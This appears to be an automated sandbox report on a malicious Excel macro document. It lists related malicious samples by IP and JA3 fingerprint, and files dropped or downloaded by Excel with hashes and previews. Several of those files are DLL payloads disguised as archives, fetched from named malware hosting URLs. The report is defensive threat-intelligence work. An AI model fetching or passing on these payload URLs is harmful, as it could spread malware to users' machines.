• SecuriteInfo.com.Generic.mg.d924aab258633ad2.dll: 69.164.207.140
• SecuriteInfo.com.Generic.mg.a373cb816e14fc35.dll: 69.164.207.140
• SecuriteInfo.com.Generic.mg.a044b05b562df10c.dll: 69.164.207.140
• SecuriteInfo.com.Generic.mg.002c56165a0e7836.dll: 69.164.207.140
• SecuriteInfo.com.Generic.mg.6d5e0ebf3d8c6d2b.dll: 69.164.207.140
• Arch_05_222-3139.doc: 173.255.195.246
• 1 Total New Invoices-Thursday January 21 2021.xlsm: 69.164.207.140
• 1 Total New Invoices-Thursday January 21 2021.xlsm: 69.164.207.140
• dxkzp.dll: 69.164.207.140
• PO210121.exe: 45.33.35.221
• flUDsS5Lcy.dll: 69.164.207.140
• printouts of outstanding_as_of_01_20_2021.xlsm: 69.164.207.140
• f77i5e.zip.dll: 69.164.207.140
• Statement of Account as of_01_20_2021.xlsm: 69.164.207.140
• bttxlf4.zip.dll: 69.164.207.140
• printouts of outstanding as of 01_20_2021.xlsm: 69.164.207.140
• Presentation_812525.xlsb: 172.104.129.156
• Statement of Account as of 01_20_2021.xlsm: 69.164.207.140

UNIFIEDLAYER-AS-1, US (all associated samples detected as malicious):
• SecuriteInfo.com.Generic.mg.a01d5a105e5f7f87.dll: 198.57.200.100
• SecuriteInfo.com.Generic.mg.fbb5fe400b44ef9a.dll: 198.57.200.100
• SecuriteInfo.com.Generic.mg.d924aab258633ad2.dll: 198.57.200.100
• SecuriteInfo.com.Generic.mg.a373cb816e14fc35.dll: 198.57.200.100
• SecuriteInfo.com.Generic.mg.a044b05b562df10c.dll: 198.57.200.100
• SecuriteInfo.com.Generic.mg.002c56165a0e7836.dll: 198.57.200.100
• SecuriteInfo.com.Generic.mg.6d5e0ebf3d8c6d2b.dll: 198.57.200.100
• LKTD0004377.doc: 162.241.123.35
• 1 Total New Invoices-Thursday January 21 2021.xlsm: 198.57.200.100
• 1 Total New Invoices-Thursday January 21 2021.xlsm: 198.57.200.100
• dxkzp.dll: 198.57.200.100
• EK6BR1KS50.exe: 162.241.60.214
• flUDsS5Lcy.dll: 198.57.200.100
• PO210119.exe.exe: 50.87.195.134
• Certificate of Origin- BEIJING & B GROUP.exe: 74.220.199.6
• po071.exe: 162.241.30.16
• printouts of outstanding_as_of_01_20_2021.xlsm: 198.57.200.100
• f77i5e.zip.dll: 198.57.200.100
• Statement of Account as of_01_20_2021.xlsm: 198.57.200.100
• Maersk_BL Draft_copy_Shipping_documents.html: 108.179.194.12

                                                                                                JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context (IPs)

7dcce5b76c8b17472d024758970a406b (all associated samples detected as malicious; each contacted the same four IPs: 192.185.224.50, 103.83.81.27, 198.136.54.91, 64.37.52.172):
• Enquiry 2021.ppt
• 1 Total New Invoices-Thursday January 21 2021.xlsm
• Notification_20443258.xls
• Notification_20443258.xls
• Success_paym_info_7275986.docm
• Success_paym_info_7275986.docm
• PO81105083.xlsx
• Contract Documents IMG_15603.doc
• dep_det_3444608.docm
• dep_det_3444608.docm
• ZANTEV.O72W.xlsx
• Purchase Order 02556.xlsx
• TT Slip.doc
• DHL Express.doc
• RFQ TK011821.doc
• RFQ-450987643.doc
• IMG_53091.doc
• User Credentials.doc
• RFQ TK011821.doc
• IMG_50617.doc

eb88d0b3e1961a0562f006e5ce2a0b87 (all associated samples detected as malicious):
• 1 Total New Invoices-Thursday January 21 2021.xlsm: 194.225.58.214
• 1 Total New Invoices-Thursday January 21 2021.xlsm: 194.225.58.214
• Notification_20443258.xls: 194.225.58.214
• Notification_20443258.xls: 194.225.58.214
• SecuriteInfo.com.VB.Heur.EmoDldr.32.DB37E181.Gen.3346.xls: 194.225.58.214
• printouts of outstanding_as_of_01_20_2021.xlsm: 194.225.58.214
• Statement of Account as of_01_20_2021.xlsm, contacting:
                                                                                                • 194.225.58.214
                                                                                                printouts of outstanding as of 01_20_2021.xlsmGet hashmaliciousBrowse
                                                                                                • 194.225.58.214
                                                                                                Statement of Account as of 01_20_2021.xlsmGet hashmaliciousBrowse
                                                                                                • 194.225.58.214
                                                                                                sample20210120-01.xlsmGet hashmaliciousBrowse
                                                                                                • 194.225.58.214
                                                                                                sample20210113-01.xlsmGet hashmaliciousBrowse
                                                                                                • 194.225.58.214
                                                                                                INV8222874744_20210111490395.xlsmGet hashmaliciousBrowse
                                                                                                • 194.225.58.214
                                                                                                Inv0209966048-20210111075675.xlsGet hashmaliciousBrowse
                                                                                                • 194.225.58.214
                                                                                                INV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                                                                                                • 194.225.58.214
                                                                                                INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                                                • 194.225.58.214
                                                                                                INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                • 194.225.58.214
                                                                                                INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                • 194.225.58.214
                                                                                                INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                • 194.225.58.214
                                                                                                Document74269.xlsGet hashmaliciousBrowse
                                                                                                • 194.225.58.214
                                                                                                Document74269.xlsGet hashmaliciousBrowse
                                                                                                • 194.225.58.214

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Microsoft Cabinet archive data, 58936 bytes, 1 file
Category: dropped
Size (bytes): 58936
Entropy (8bit): 7.994797855729196
Encrypted: true
SSDEEP: 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5: E4F1E21910443409E81E5B55DC8DE774
SHA1: EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256: CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512: 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious: false
Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 893
Entropy (8bit): 7.366016576663508
Encrypted: false
SSDEEP: 24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5: D4AE187B4574036C2D76B6DF8A8C1A30
SHA1: B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256: A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512: 1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious: false
Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 326
Entropy (8bit): 3.1147363886328936
Encrypted: false
SSDEEP: 6:kKtJwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:4kPlE99SNxAhUegeT2
MD5: DF1E09CF3775145C442F9FB0AB6C362A
SHA1: 1AE04CB8F8A23F05DA7CF04B831638D7ED73D439
SHA-256: DEE970688D1406C921AF17F7D8CB30E235E4B1A361A8B172E34D8CEBD4494C65
SHA-512: DFA401348D067355400674F91DAEFA19D5051E9EC9C6027C555ED04078B6B66718EE862F980DD1DA8191BD89103A49882B1F3909B626CCE2877C72507AD1D86D
Malicious: false
Preview: p...... ........"...Q...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 252
Entropy (8bit): 3.0294634724686764
Encrypted: false
SSDEEP: 3:kkFklsZEttfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKnERliBAIdQZV7eAYLit
MD5: 10E3FF0416066B18C49A1656EFABC8B0
SHA1: 11037AE57ED5FFD7695302D7F3BA7CD23E708759
SHA-256: 96797ACFDC1A043CCF1D0FB07F8E331655A151C27B06FCE35D3F69EE6566D523
SHA-512: 6CBFA7E675415FC4016B72A9966CF18EBF4CDBE4F08530C0F41C8FC3333DDD95347BD7C0D44DDF6C2CADA2B897BC1D9607792AEBF34173212C9FA62BA3B90337
Malicious: false
Preview: p...... ....`.......Q...(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gjeicn6u9[1].rar
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 40960
Entropy (8bit): 6.930178555398242
Encrypted: false
SSDEEP: 768:cqJOEsToMKj1cuVA711wqG99e7WhVEyIzQu18Ax9Vnysq4p:ZJ6Kj1cue711wqi9e8VHZix9Vysq4p
MD5: 5589EA0025F3F1B4DDAC99B9DF2FD133
SHA1: 1F1F0189AEFC627A954C7FC30DD57AA65BBC1CBB
SHA-256: 11D900EFD3629DF06B0FA04968E024F4C4CE5B2DC2BA231160712ACC7791B76E
SHA-512: BA0D72C133333FF8423D7BB40F994FD75D372A1497FBD23B9D6E3BC407D6D0E22C2661242B8C4DF93371970EF745E03A6595DA9594E89872C8339593BEEAA4A2
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o.{.o.{.o.{...x.b.{...~..{.....x.{..~.M.{......{..x.y.{.....j.{.o.z.;.{..r.n.{..{.n.{....n.{..y.n.{.Richo.{.........PE..L......]...........!.....t................................................................@.............................d...4...P....P.......................`...'..|...T..............................@............................................text....r.......t.................. ..`.rdata...X.......Z...x..............@..@.data....[..........................@....rsrc........P......................@..@.reloc...'...`...(..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\or3peb[1].rar
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: downloaded
Size (bytes): 856064
Entropy (8bit): 6.628843593684541
Encrypted: false
SSDEEP: 12288:DIRKl993y8SebVD0DJZ58TCBjDGfYn+dcZGUgpsI9w3pYPuydt4We6NBexcpFqme:sRKE3eJDUJsTCZSfmUU+9Yz0Og
MD5: 4746FBED409F87EC6DDB6653CB4E201C
SHA1: B8EE3F60F74553E44D42B0F47A0A4A55ED644C97
SHA-256: 864E95D36584E9DB7BCD7552272E446A4C7CBC6601DCD4F4A2687D96374B439B
SHA-512: E6DEF1B637B3AEA0D0F4ED27ADD38E9330E15CDA1A38A1DD228799296497DDD0BF13F89022F0491FA98E735B5CCFF0F621429A7606D6C3ECB0F57372157B405C
Malicious: true
IE Cache URL: https://shopandmartonline.com/or3peb.rar
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o.{.o.{.o.{...x.b.{...~..{.....x.{..~.M.{......{..x.y.{.....j.{.o.z.;.{..r.n.{..{.n.{....n.{..y.n.{.Richo.{.........PE..L......]...........!.....t................................................................@.............................d...4...P....P.......................`...'..|...T..............................@............................................text....r.......t.................. ..`.rdata...X.......Z...x..............@..@.data....[..........................@....rsrc........P......................@..@.reloc...'...`...(..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hknmwj[1].zip
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: downloaded
Size (bytes): 856064
Entropy (8bit): 6.628853255480928
Encrypted: false
SSDEEP: 12288:LIRKl993y8SebVD0DJZ58TCBjDGfYn+dcZGUgpsI9w3pYPuydt4We6NBexcpFqmq:ERKE3eJDUJsTCZSfmUU+9Yz0Og
MD5: B613AB3EEF642E50999219C6BC103C24
SHA1: D2DF29F7ACFC78B500217AF07BC69B558E08D12E
SHA-256: 4BFDDDE9F8B6C92A2436385CEDF3F5ACF3A3284A22F40390A503DECAD56EECF9
SHA-512: DC8B8909964B85799DA724B38A1D6A8EC96B64B3A8BB359B1647AF6B009A363A7343DDA93C44AF362D3476939A731FE7A333E07CB329D41E4E4095CB8D0B3527
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 9%
IE Cache URL: http://stellarum.com.br/hknmwj.zip
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o.{.o.{.o.{...x.b.{...~..{.....x.{..~.M.{......{..x.y.{.....j.{.o.z.;.{..r.n.{..{.n.{....n.{..y.n.{.Richo.{.........PE..L.....]...........!.....t................................................................@.............................d...4...P....P.......................`...'..|...T..............................@............................................text....r.......t.................. ..`.rdata...X.......Z...x..............@..@.data....[..........................@....rsrc........P......................@..@.reloc...'...`...(..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\clh6qq[1].zip
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: modified
Size (bytes): 32768
Entropy (8bit): 6.908368157415385
Encrypted: false
SSDEEP: 768:PqJOEsToMKj1c9VA711wqG99e7WhVEyIzQu18t:CJ6Kj1c9e711wqi9e8VHZD
MD5: 0A7945CBC0178E94E51FBFEB7E4B87EF
SHA1: AD4DF936C9ABB4C956DF6FC37A6E3120A9E36603
SHA-256: 3DA4558EEA9D229912F46D1D14906CB9837436A76AB81AAF8DB44182C9148BE8
SHA-512: 4EB0B69BE8C99B127F7A9353FE757F64B61FE63E9A0D2570E586975B773A9760B10A322FE8A1B2149F49D8C5D2BC3D1F7110F86B994FD2AAEF967261065F3F25
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o.{.o.{.o.{...x.b.{...~..{.....x.{..~.M.{......{..x.y.{.....j.{.o.z.;.{..r.n.{..{.n.{....n.{..y.n.{.Richo.{.........PE..L.....]...........!.....t................................................................@.............................d...4...P....P.......................`...'..|...T..............................@............................................text....r.......t.................. ..`.rdata...X.......Z...x..............@..@.data....[..........................@....rsrc........P......................@..@.reloc...'...`...(..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\l3v7tq4[1].rar
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: downloaded
Size (bytes): 856064
Entropy (8bit): 6.628843593684541
Encrypted: false
SSDEEP: 12288:DIRKl993y8SebVD0DJZ58TCBjDGfYn+dcZGUgpsI9w3pYPuydt4We6NBexcpFqme:sRKE3eJDUJsTCZSfmUU+9Yz0Og
MD5: 4746FBED409F87EC6DDB6653CB4E201C
SHA1: B8EE3F60F74553E44D42B0F47A0A4A55ED644C97
SHA-256: 864E95D36584E9DB7BCD7552272E446A4C7CBC6601DCD4F4A2687D96374B439B
SHA-512: E6DEF1B637B3AEA0D0F4ED27ADD38E9330E15CDA1A38A1DD228799296497DDD0BF13F89022F0491FA98E735B5CCFF0F621429A7606D6C3ECB0F57372157B405C
Malicious: true
IE Cache URL: https://qsf.surfescape.net/l3v7tq4.rar
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o.{.o.{.o.{...x.b.{...~..{.....x.{..~.M.{......{..x.y.{.....j.{.o.z.;.{..r.n.{..{.n.{....n.{..y.n.{.Richo.{.........PE..L......]...........!.....t................................................................@.............................d...4...P....P.......................`...'..|...T..............................@............................................text....r.......t.................. ..`.rdata...X.......Z...x..............@..@.data....[..........................@....rsrc........P......................@..@.reloc...'...`...(..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A64C1FA3.emf
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 1408
Entropy (8bit): 2.480393394045803
Encrypted: false
SSDEEP: 12:YmOALmlzslqcuMap0bCvIEeQpN4lZsrBKlhuzK6ll6uatDUdG3tLMk+QCeJ1OcrI:Yf9s40bi34giukueDUdG3teh
MD5: 06CEB615EBA04193F1167A8E16D24D72
SHA1: E3BEB08C64C56D72BD7E333EC25E7139A3639580
SHA-256: A1D83B13577385965D59963AF5C15DECA6DE97AAA0C0C0446EBB4F46EE340309
SHA-512: 59F26C72A1124548CCB0C4598B709FD00E497F50EC181278B06EAC62EC19F943853142E596BE5A0136F524F9E13B05547B3648A2161E22D030D5B7128122EEC5
Malicious: false
Preview: ....l................................... EMF........).......................`...1........................|..F...........GDIC........L.lQ......................................................................................................iii.......-.....................-.....................-.....................-.....................-.........!...............'...........................-.........!.........................$.............................-...............'.................$.............................-...............'.......................................................................................!...............................!...............................'...............iii.....%...........'.......................%...........'.......................%...........'.......................%...........'.......................%...........L...d...................................!..............?...........?................................"...........!...................
                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B460DCA9.png
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:PNG image data, 200 x 254, 8-bit colormap, non-interlaced
                                                                                                Category:dropped
                                                                                                Size (bytes):3002
                                                                                                Entropy (8bit):7.906419168841271
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:4MG29JWe/2RNqBIXXwVNLYkCdMSktTRjwDL/F2b73QXzHwdtNdgFBMn8mKL:4MGisWBuXcUkiH2KdMozQdtNd7wL
                                                                                                MD5:7E8C8DDAE452014B6DAE41F13E3945EF
                                                                                                SHA1:D70ECBB146F1BF78DA70A3D387EB1CDAF480CF9C
                                                                                                SHA-256:01C390937B5D91BC26ED089AB82DB7CC7B1CCDC712244F648EE1348FE15D0C46
                                                                                                SHA-512:B12CB86CD9B1BA497ED5F1D283321505AF0708603B840D2B25357BBA8167209114CD72A1EE4F6D489EEF97039436117AEBEA1ABD5DF8AA395684DD0BFDF4931A
                                                                                                Malicious:false
                                                                                                Preview: .PNG........IHDR.............H.......tEXtSoftware.Adobe ImageReadyq.e<....PLTE.......onp.............=o...8IDATx..]...0.......W..;..vL..u.W}... P?d...@.H.I .$.|6.,...B...dO..>({..E.T..P......O...~.....Y......*|.H....+u..|A..n.rC....U.......\.....rm/.0]....)........f....iG..' ..(.}..,@.zD.bK..g.U.U..... ...."m".]g-"D..E.6.V.-R.H}{.\..7.........Q..6. ........Y..}g.Z...@D.O....v9.H....Y.;4.b9u.~.F.G...G..pm..........`...4..I.TM.(...GV...pr M.P...nl......H..!..N.".....!. =.i...!..3;....<.,/H.....et...@.H.I .d` .yf.s.....-@X.`Bq...T]:..^...Q%...A$_....'..V.K$.....V .$-1....V)..Y...8.J O.V!..*41..I....4^!qs...(..C..... .]T...sb..%..g..F ....Fw..-....y..P[C...C....'..[.5.7(...I.%z'.Vgev.g}[....yo.!L]......;-.Y.6...(.......@.7..0....d..GY..q....o..*..7r.q>=qH..^.......;..b....B...(.L].m...H...J"..hs.:R...F.^K...$...WI..'-.~..7..mDLD.*.....}..C.S........]..lJ.H...\t..b..c......y;.C]..[>...+I .$.$..r. L.-...@.H.a.S..OF.|4.;..cW...>...g....l./-
                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD638D48.png
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:PNG image data, 247 x 76, 8-bit colormap, non-interlaced
                                                                                                Category:dropped
                                                                                                Size (bytes):1410
                                                                                                Entropy (8bit):7.761009123150044
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:bLdquwHt3Tm70jwSYpRqaTBIoY6lqSGbeRE2lCCqPtm69A3A9taREqVPNoLLk9:XMRhwSYWYioxRE2letP9A3AaVELk9
                                                                                                MD5:766C3D5E7B46F9106C4199126F75F1D6
                                                                                                SHA1:E3BE7D184728E7CAD36ABFD1CB8291DBBE2DDB92
                                                                                                SHA-256:57ECD0C929D294F692E9EFE0BFDF14A047CBEA50994DA7BE0055023F13D516F2
                                                                                                SHA-512:36185630CD8DCA8C1A77D0572576707F5A9493D8BF96CF8FEF38DA5BFF6D995466B17FC7CACD6A0A55241707B2B1B0473E552C596931724A0CE43AD7A635BDD4
                                                                                                Malicious:false
                                                                                                Preview: .PNG........IHDR.......L......_......tEXtSoftware.Adobe ImageReadyq.e<....PLTE.....$bgk#.........}..q.8.....IDATx....*.......x...L...;...1.......,..r.-..r..R..[..{.&...RB/ K-...4S']q/...~A]Fl..%....F....#e.....)A.z.k.\.....Y...k+.....z.@.I.e....7..M..B.=.....kX.V....WQ.y.;......w..R|.]..E...`.k..@cnh.[..D.X.;.v..(.PPmu...k..p..t...Ob..SW1...[.Tv.......^.tb...Fh..G..45^.r.......}s....|.....wqw..^&k.ws..7.9.......1>....o.W..=...rn7;.w.i.@...s.3/8h.A.fS.....X3.{~..O.n.:.7.#.$..t..)7...gss...C...!....E..:.b+3.[......d.a.Ey....eY..Q.....F...nl}.8...\.%n......L."o./}....B7oi.L..\.?.........U-C....BM..`.z.z..XG..%6..kyW.KD.y..{.W......A.a...CI...z..t.c.9...o..[.........MG....w..;.+.D.m...Y;.......n.M[.E.j..86'n\Rj.../.V.....2.O.6T...C.7.%.....p..tAU+...b&v..F7b....aH.B........;Qf......g...-q0...y..r..4.y.+.<.e.k..'.G...r.1[Q..1r..........SN.n2...%<.).. ^.....Cu......|...K<.7j..Q..x.(.q.G.k..-.[....[^....F...xV...w..{9...X...W...M.r4..-.......r.
                                                                                                C:\Users\user\AppData\Local\Temp\561F0000
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):51783
                                                                                                Entropy (8bit):7.8028777584719435
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:X/kvxtnsJeoRJyX1LF1CgOQJCzN/XFqcvh:XcpB32KLFqQJCzNn
                                                                                                MD5:32EF05AD85A38FACFA514BE77D73985F
                                                                                                SHA1:E274BF14E01F0C655D048EB6DE0A0037832483AD
                                                                                                SHA-256:8E88147160B0DF345E79E07628EF2A2A67270EB64AADDB8725EAEF8164F7236D
                                                                                                SHA-512:CA5F3856857B56B0D6058A2824C8C45BF764C0FDDC4CD474C35C7CD0F1239DF20E63B126D4F4BA78BDA46C80D4E2429C2086D274E6CF96EDEA353D45DECC6F6B
                                                                                                Malicious:false
                                                                                                Preview: .VKo.0..W..@.V.M*UU.l.Mzl#%.z.....K.C...1l6..F........a}.*.4.0:'..$..)..r...K..$>0]0i4.d..\m.Y..-.......~.......q.4N..........^.V.(7:..i..d....=..8.;..M...{Q*'.Z)8.h.6.8.IMY.......3o.....A..:....B..<...VW'.BE.q~....D.i\..8...4...s.!......w.....2..q\3...9..{..Gc..T9Q@r.\...n!m%}4n.5f.M..j..r.Y...b....p...........i7\,.|F........L..#.B..gD./|..O>.."......NEG3..>.%.W..'.S.....`..^..K...E..{z......ft......0.#........Tb.A.!1Q..-.u.'.-!~..qcCDb..:X~6.ZOD........3Ty.......q..................PK..........!...U.............[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Local\Temp\Cab290.tmp
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                                Category:dropped
                                                                                                Size (bytes):58936
                                                                                                Entropy (8bit):7.994797855729196
                                                                                                Encrypted:true
                                                                                                SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                                MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                                SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                                SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                                SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                                Malicious:false
                                                                                                Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                                C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):241332
                                                                                                Entropy (8bit):4.20675637693048
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:cGdLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cYNNSk8DtKBrpb2vxrOpprf/nVq
                                                                                                MD5:12CE50A0903414B6DAD881529AC9527F
                                                                                                SHA1:893F555E08DB39287D1418353954DAC578E16FAF
